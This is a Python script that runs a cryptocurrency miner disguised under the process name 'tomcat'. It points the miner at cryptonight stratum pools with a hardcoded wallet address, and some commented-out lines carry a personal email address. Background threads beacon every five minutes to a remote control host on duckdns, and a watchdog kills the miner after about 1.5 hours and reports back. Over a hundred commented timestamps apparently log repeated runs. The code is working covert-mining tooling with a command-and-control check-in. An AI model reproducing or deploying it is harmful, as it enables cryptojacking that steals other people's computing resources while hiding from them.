import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:28:03.418669
#2018-02-17 17:15:07.340718
#2018-02-17 19:04:06.666688
#2018-02-17 20:53:01.918947
#2018-02-17 22:40:07.253178
#2018-02-18 00:24:04.042957
#2018-02-18 02:15:04.324797
#2018-02-18 04:02:06.890825
#2018-02-18 05:53:06.803288
#2018-02-18 07:44:01.313540
#2018-02-18 09:33:07.471361
#2018-02-18 11:19:07.009788
#2018-02-18 13:05:02.061045
#2018-02-18 14:52:06.527699
#2018-02-18 16:41:07.712328
#2018-02-18 18:30:08.793168
#2018-02-18 20:18:02.229075
#2018-02-18 22:03:01.314806
#2018-02-18 23:51:07.643192
#2018-02-19 01:38:01.803061
#2018-02-19 03:26:01.285225
#2018-02-19 05:11:01.460955
#2018-02-19 06:56:06.049460
#2018-02-19 08:45:05.955859
#2018-02-19 10:33:06.352576
#2018-02-19 12:22:04.183798
#2018-02-19 14:10:08.837153
#2018-02-19 15:58:01.651894
#2018-02-19 17:46:07.190983
#2018-02-19 19:32:06.323762
#2018-02-19 21:19:06.300581
#2018-02-19 23:06:07.491418
#2018-02-20 00:52:04.034630
#2018-02-20 02:41:01.933388
#2018-02-20 04:30:04.292289
#2018-02-20 06:14:05.844998
#2018-02-20 07:59:05.465050
#2018-02-20 09:44:04.919023
#2018-02-20 11:28:08.164492
#2018-02-20 13:14:08.879564
#2018-02-20 15:00:03.035056
#2018-02-20 16:44:08.175876
#2018-02-20 18:32:01.919080
#2018-02-20 20:23:07.206622
#2018-02-20 22:08:04.500083
#2018-02-20 23:50:10.027185
#2018-02-21 01:37:01.427163
#2018-02-21 03:24:01.617169
#2018-02-21 05:12:03.912552
#2018-02-21 06:59:01.458114
#2018-02-21 08:46:01.728088
#2018-02-21 10:32:01.345796
#2018-02-21 12:19:09.852115
#2018-02-21 14:06:07.435420
#2018-02-21 15:51:04.391787
#2018-02-21 17:42:08.114645
#2018-02-21 19:29:01.807313
#2018-02-21 21:17:01.881227
#2018-02-21 23:03:07.031070
#2018-02-22 00:52:04.459589
#2018-02-22 02:39:01.349770
#2018-02-22 04:24:07.894351
#2018-02-22 06:09:06.521194
#2018-02-22 07:54:06.899794
#2018-02-22 09:44:05.130772
#2018-02-22 11:30:05.750986
#2018-02-22 13:16:07.510394
#2018-02-22 15:05:09.319264
#2018-02-22 16:48:10.187482
#2018-02-22 18:37:06.980506
#2018-02-22 20:27:08.353754
#2018-02-22 22:14:01.546315
#2018-02-23 00:01:05.058169
#2018-02-23 01:50:06.471187
#2018-02-23 03:40:03.814741
#2018-02-23 05:25:04.069524
#2018-02-23 07:11:01.527782
#2018-02-23 09:16:08.321223
#2018-02-23 11:23:01.458295
#2018-02-23 13:13:06.372273
#2018-02-23 14:58:06.276428
#2018-02-23 16:47:09.710973
#2018-02-23 18:34:07.559505
#2018-02-23 20:22:03.672505
#2018-02-23 22:09:05.936547
#2018-02-23 23:56:01.834507
#2018-02-24 01:45:03.918526
#2018-02-24 03:38:06.258470
#2018-02-24 05:22:02.001202
#2018-02-24 07:10:08.635699
#2018-02-24 08:57:06.454318
#2018-02-24 10:57:01.301161
#2018-02-24 12:47:01.341889
#2018-02-24 14:36:04.474922
#2018-02-24 16:23:06.151541
#2018-02-24 18:17:04.057183
#2018-02-24 20:03:01.910618
#2018-02-24 21:45:09.207710
#2018-02-25 00:42:06.891585
#2018-02-25 03:34:01.863552
#2018-02-25 07:19:03.764942